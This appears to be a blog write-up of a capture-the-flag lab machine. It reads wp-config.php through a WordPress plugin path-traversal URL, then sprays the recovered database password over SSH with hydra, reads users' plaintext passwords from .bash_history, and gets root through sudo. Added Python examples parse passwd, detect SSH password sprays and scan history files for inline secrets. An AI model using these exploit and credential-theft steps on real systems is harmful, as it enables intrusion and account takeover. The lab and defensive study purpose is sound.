daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:x:108:111::/var/run/dbus:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh
mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false
RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash
ETollefson:x:1002:1002::/home/ETollefson:/bin/bash
DSwanger:x:1003:1003::/home/DSwanger:/bin/bash
AParnell:x:1004:1004::/home/AParnell:/bin/bash
SHayslett:x:1005:1005::/home/SHayslett:/bin/bash
MBassin:x:1006:1006::/home/MBassin:/bin/bash
JBare:x:1007:1007::/home/JBare:/bin/bash
LSolum:x:1008:1008::/home/LSolum:/bin/bash
IChadwick:x:1009:1009::/home/IChadwick:/bin/false
MFrei:x:1010:1010::/home/MFrei:/bin/bash
SStroud:x:1011:1011::/home/SStroud:/bin/bash
CCeaser:x:1012:1012::/home/CCeaser:/bin/dash
JKanode:x:1013:1013::/home/JKanode:/bin/bash
CJoo:x:1014:1014::/home/CJoo:/bin/bash
Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin
JLipps:x:1017:1017::/home/JLipps:/bin/sh
jamie:x:1018:1018::/home/jamie:/bin/sh
Sam:x:1019:1019::/home/Sam:/bin/zsh
Drew:x:1020:1020::/home/Drew:/bin/bash
jess:x:1021:1021::/home/jess:/bin/bash
SHAY:x:1022:1022::/home/SHAY:/bin/bash
Taylor:x:1023:1023::/home/Taylor:/bin/sh
mel:x:1024:1024::/home/mel:/bin/bash
kai:x:1025:1025::/home/kai:/bin/sh
zoe:x:1026:1026::/home/zoe:/bin/bash
NATHAN:x:1027:1027::/home/NATHAN:/bin/bash
www:x:1028:1028::/home/www:
postfix:x:112:118::/var/spool/postfix:/bin/false
ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false
elly:x:1029:1029::/home/elly:/bin/bash

PS: as noted earlier, the target uses a self-signed certificate, so certificate verification has to be disabled; wget therefore needs the corresponding option as well.

That gives the full password file and a large list of users. Extract the real users with a bash shell and save them for later use:

┌──(kali㉿kali)-[~/Work/stepler/12380]
└─$ cat 540471516.jpeg |grep bash | awk -F: '{print $1}' >> ../name.txt

┌──(kali㉿kali)-[~/Work/stepler/12380]
└─$ cat ../name.txt
Elly
John
scott
RNunemaker
ETollefson
DSwanger
AParnell
SHayslett
MBassin
JBare
LSolum
MFrei
SStroud
JKanode
CJoo
Drew
jess
SHAY
mel
zoe
NATHAN
elly
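One caveat on the `grep bash` filter above: it only keeps accounts whose line contains the string `bash`, so users whose login shell is zsh, sh or dash (peter, Sam, jamie, kai, Taylor, JLipps, CCeaser in the listing above) are dropped, as is `www`, whose shell field is empty, which passwd(5) treats as `/bin/sh`. Filtering on the shell field instead is both the more complete way to build a user list and the way an administrator would audit which accounts can actually log in. The following is an added example, not part of the original writeup: a small passwd parser that returns every account with a real login shell, compared against the writeup's own pipeline. The sample is an excerpt of the listing above; the choice of 1000 as the lowest regular-user UID is an assumption (Debian's default).

```python
# Shells that never give a login; anything else counts as interactive.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}

# Excerpt of the /etc/passwd listing retrieved above (subset, unchanged lines).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh
RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash
IChadwick:x:1009:1009::/home/IChadwick:/bin/false
CCeaser:x:1012:1012::/home/CCeaser:/bin/dash
Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
jamie:x:1018:1018::/home/jamie:/bin/sh
Sam:x:1019:1019::/home/Sam:/bin/zsh
zoe:x:1026:1026::/home/zoe:/bin/bash
www:x:1028:1028::/home/www:
mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false
elly:x:1029:1029::/home/elly:/bin/bash
"""


def parse_passwd(text: str) -> list:
    """Parse passwd(5) lines into dicts; an empty shell field means /bin/sh per passwd(5)."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed or truncated line: skip rather than guess
        name, _pw, uid, gid, gecos, home, shell = fields
        entries.append({
            "name": name,
            "uid": int(uid),
            "gid": int(gid),
            "gecos": gecos,
            "home": home,
            "shell": shell or "/bin/sh",
        })
    return entries


def interactive_accounts(text: str, min_uid: int = 1000) -> list:
    """Names of root and regular users (uid >= min_uid) that have a login shell."""
    return [
        e["name"]
        for e in parse_passwd(text)
        if (e["uid"] == 0 or e["uid"] >= min_uid) and e["shell"] not in NOLOGIN_SHELLS
    ]


def bash_only(text: str) -> list:
    """The writeup's `grep bash | awk -F: '{print $1}'` pipeline, for comparison."""
    return [line.split(":")[0] for line in text.splitlines() if "bash" in line]


if __name__ == "__main__":
    print("by shell:", interactive_accounts(SAMPLE_PASSWD))
    print("grep bash:", bash_only(SAMPLE_PASSWD))
```

On the excerpt, the shell-based filter returns nine accounts while the `grep bash` pipeline returns three; peter, the account that later turns out to hold full sudo rights, is among the six it misses.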

Now try reading the config file /blogblog/wp-config.php:

https://192.168.56.134:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php


It works; download it and check the contents for sensitive information:

...
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'plbkac');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
...

It contains the target's database credentials: root:plbkac

That leaves two directions:

  • Based on the earlier enumeration the target exposes 3306 and has a web admin panel, so MySQL could be used for privilege escalation and RCE;
  • Use the recovered database password together with the collected usernames for a password spray against SSH.

Password spraying

Password spraying with hydra:

┌──(kali㉿kali)-[~/Work/stepler]
└─$ hydra -L name.txt -P pass.txt 192.168.56.134 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-05-02 12:32:54
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 23 login tries (l:23/p:1), ~2 tries per task
[DATA] attacking ssh://192.168.56.134:22/
[22][ssh] host: 192.168.56.134   login: zoe   password: plbkac
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-05-02 12:33:07
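The hydra run above has a characteristic footprint on the target: within a few seconds one source address produces failed password authentications for many different usernames (one or two tries each), and then, if the spray hits, an accepted login from the same address. That is the opposite shape from a brute force against a single account and is easy to separate from it. The following is an added example, not part of the original writeup: a detector that parses sshd lines from auth.log, groups them by source address, and reports any address that fails against at least `min_users` distinct usernames inside a sliding window, together with any account it subsequently logged in to. The log lines are constructed to model the run above (PIDs, ports and timestamps are invented; the syslog format carries no year, so times are compared within the same year).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed auth.log excerpt modelled on the hydra run above (not real logs).
SAMPLE_AUTH_LOG = """\
May  2 12:32:55 red sshd[2101]: Failed password for invalid user Elly from 192.168.56.128 port 50210 ssh2
May  2 12:32:55 red sshd[2102]: Failed password for invalid user John from 192.168.56.128 port 50212 ssh2
May  2 12:32:56 red sshd[2103]: Failed password for invalid user scott from 192.168.56.128 port 50214 ssh2
May  2 12:32:56 red sshd[2104]: Failed password for RNunemaker from 192.168.56.128 port 50216 ssh2
May  2 12:32:57 red sshd[2105]: Failed password for ETollefson from 192.168.56.128 port 50218 ssh2
May  2 12:32:58 red sshd[2106]: Failed password for DSwanger from 192.168.56.128 port 50220 ssh2
May  2 12:33:00 red sshd[2107]: Failed password for AParnell from 192.168.56.128 port 50222 ssh2
May  2 12:33:06 red sshd[2119]: Accepted password for zoe from 192.168.56.128 port 50240 ssh2
May  2 12:40:00 red sshd[2200]: Failed password for peter from 192.168.56.20 port 41000 ssh2
May  2 12:40:05 red sshd[2201]: Failed password for peter from 192.168.56.20 port 41001 ssh2
May  2 12:40:09 red sshd[2202]: Failed password for peter from 192.168.56.20 port 41002 ssh2
"""

SSHD_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<event>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2"
)


def parse_sshd_log(text: str) -> list:
    """Extract password-auth events from sshd syslog lines (other lines are ignored)."""
    events = []
    for line in text.splitlines():
        m = SSHD_RE.match(line)
        if not m:
            continue
        # Collapse the double space in "May  2" before parsing; syslog has no year.
        ts = datetime.strptime(" ".join(m["ts"].split()), "%b %d %H:%M:%S")
        events.append({"time": ts, "event": m["event"], "user": m["user"], "ip": m["ip"]})
    return events


def detect_password_sprays(text: str, window: timedelta = timedelta(seconds=60),
                           min_users: int = 5) -> list:
    """Report source IPs that failed against >= min_users distinct users within `window`."""
    by_ip = defaultdict(list)
    for e in parse_sshd_log(text):
        by_ip[e["ip"]].append(e)
    findings = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["time"])
        failures = [e for e in evs if e["event"] == "Failed"]
        best_users = set()
        # Sliding window anchored at each failure: widest set of distinct usernames.
        for i, start in enumerate(failures):
            users = {e["user"] for e in failures[i:] if e["time"] - start["time"] <= window}
            if len(users) > len(best_users):
                best_users = users
        if len(best_users) >= min_users:
            first_fail = failures[0]["time"]
            accepted = sorted({e["user"] for e in evs
                               if e["event"] == "Accepted" and e["time"] >= first_fail})
            findings.append({
                "ip": ip,
                "distinct_users": len(best_users),
                "users": sorted(best_users),
                "accepted_after": accepted,  # accounts the sprayer then logged in to
            })
    return findings


if __name__ == "__main__":
    for finding in detect_password_sprays(SAMPLE_AUTH_LOG):
        print(finding)
```

On the sample it reports 192.168.56.128 (seven usernames in five seconds, followed by an accepted login as zoe) and stays quiet about 192.168.56.20, whose three failures all target one account and belong to a different detector. The `accepted_after` field is the part worth alerting on, since it marks the point at which a spray turned into a compromised account.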

That yields a valid SSH credential; log in over SSH and try to escalate privileges.

┌──(kali㉿kali)-[~/Work/stepler]
└─$ ssh zoe@192.168.56.134
The authenticity of host '192.168.56.134 (192.168.56.134)' can't be established.
ED25519 key fingerprint is SHA256:eKqLSFHjJECXJ3AvqDaqSI9kP+EbRmhDaNZGyOrlZ2A.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.134' (ED25519) to the list of known hosts.
-----------------------------------------------------------------
~          Barry, don't forget to put a message here           ~
-----------------------------------------------------------------
zoe@192.168.56.134's password:
Welcome back!


zoe@red:~$ whoami
zoe
zoe@red:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for zoe:
Sorry, user zoe may not run sudo on red.
zoe@red:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root   test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root   test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root   test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
zoe@red:~$ ls -al
total 28
drwxr-xr-x  3 zoe  zoe  4096 May  3 01:27 .
drwxr-xr-x 32 root root 4096 Jun  4  2016 ..
-rw-r--r--  1 root root    9 Jun  5  2016 .bash_history
-rw-r--r--  1 zoe  zoe   220 Sep  1  2015 .bash_logout
-rw-r--r--  1 zoe  zoe  3771 Sep  1  2015 .bashrc
drwx------  2 zoe  zoe  4096 May  3 01:27 .cache
-rw-r--r--  1 zoe  zoe   675 Sep  1  2015 .profile
zoe@red:/home$ ls
AParnell  CJoo  DSwanger  elly        IChadwick  JBare  JKanode  kai     LSolum2  mel    NATHAN  RNunemaker  SHAY       SStroud  www
CCeaser   Drew  Eeth      ETollefson  jamie      jess   JLipps   LSolum  MBassin  MFrei  peter   Sam         SHayslett  Taylor   zoe

Login succeeds, but there is no sudo access and no cron job usable for escalation (kernel exploits are set aside for now). The parent directory holds a large number of local users.

A closer look shows that every user's home directory is accessible and most contain a .bash_history file, so all of them are worth reading for useful information:

zoe@red:/home$ cat ./*/.bash_history
exit
free
exit
exit
exit
exit
exit
exit
exit
exit
top
ps aux
exit
exit
exit
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
exit
exit
exit
exit
whoami
exit
exit
exit
exit
exit
cat: ./peter/.bash_history: Permission denied
exit
exit
exit
exit
exit
exit
id
top
exit

Other accounts' login credentials are visible in there.

PS: for convenience, some operators use sshpass to put the username and password in clear text on a single command line. It is faster, but not safe: the plaintext credential ends up recorded in the shell history.

Log in to the other two accounts with the new credentials:
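The leak described above is one an administrator can audit for directly: shell history files are plain text, and the command shapes that carry a password inline (`sshpass -p`, `mysql -p<pw>`, `curl -u user:pass`, `export ..._PASSWORD=`) are few and regular. The following is an added example, not part of the original writeup: a scanner that walks history text line by line, matches those shapes, and reports each hit with the secret redacted so the report itself does not become a second copy of the credential. The sample history is constructed: it contains the two sshpass lines from the dump above plus two invented lines, and the list of patterns is a starting point, not a complete catalogue.

```python
import re

# (label, pattern); every pattern captures the secret in the "secret" group.
SECRET_PATTERNS = [
    ("sshpass -p", re.compile(r"\bsshpass\b.*?\s-p\s*(?P<secret>\S+)")),
    ("mysql -p/--password=", re.compile(r"\bmysql\b.*?\s(?:-p|--password=)(?P<secret>\S+)")),
    ("curl/wget -u user:pass",
     re.compile(r"\b(?:curl|wget)\b.*?\s(?:-u|--user)[=\s]+[^:\s]+:(?P<secret>\S+)")),
    ("exported secret variable",
     re.compile(r"\w*(?:PASSWORD|PASSWD|SECRET|TOKEN)\w*=(?P<secret>\S+)", re.IGNORECASE)),
]

# Constructed .bash_history excerpt: lines 2 and 4 are from the dump above,
# lines 5 and 6 are invented for the example.
SAMPLE_HISTORY = """\
ls -lah
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
mysql -u root -pplbkac wordpress
export DB_PASSWORD=hunter2
ps -ef
"""


def redact(secret: str) -> str:
    """Keep the first character so hits can be matched to a known credential, mask the rest."""
    return secret[0] + "*" * (len(secret) - 1) if len(secret) > 1 else "*"


def scan_history(text: str, source: str = "history") -> list:
    """Return one finding per line that carries an inline credential, secret redacted."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, pattern in SECRET_PATTERNS:
            m = pattern.search(line)
            if not m:
                continue
            secret = m.group("secret")
            findings.append({
                "source": source,
                "line": lineno,
                "kind": kind,
                "redacted": line.replace(secret, redact(secret)),
            })
            break  # one finding per line is enough
    return findings


if __name__ == "__main__":
    for finding in scan_history(SAMPLE_HISTORY, source="sample .bash_history"):
        print(finding)
```

On the sample it flags lines 2, 4, 5 and 6 and leaves `apt-get install sshpass` alone, since that line names the tool without a password. The fix on the operations side is not to put the secret on the command line at all (command lines are also visible to every local user through `ps`): sshpass reads the password from the `SSHPASS` environment variable with `-e` or from a file with `-f`, and SSH keys remove the need for it entirely.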

JKanode@red:~$ whoami
JKanode
JKanode@red:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for JKanode:
Sorry, user JKanode may not run sudo on red.

peter@red:~$ whoami
peter
peter@red:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for peter:
Matching Defaults entries for peter on red:
    lecture=always, env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User peter may run the following commands on red:
    (ALL : ALL) ALL

peter has full sudo rights, so root can be obtained through them.

Privilege escalation & flag

Get root via sudo:

peter@red:~$ sudo -i
➜  ~ whoami
root
➜  ~ ls
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql
➜  ~ cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b

Privilege escalation succeeded and the flag was retrieved.

Summary

  • Information gathering is crucial in a penetration test: anything that might be a person's name is worth recording, since it narrows the scope of later password spraying or weak-password testing;
  • When a command-line request to a web service fails, try skipping certificate verification; almost every tool has an option for it.
Posted 2026-05-03 00:55 by shinianyunyan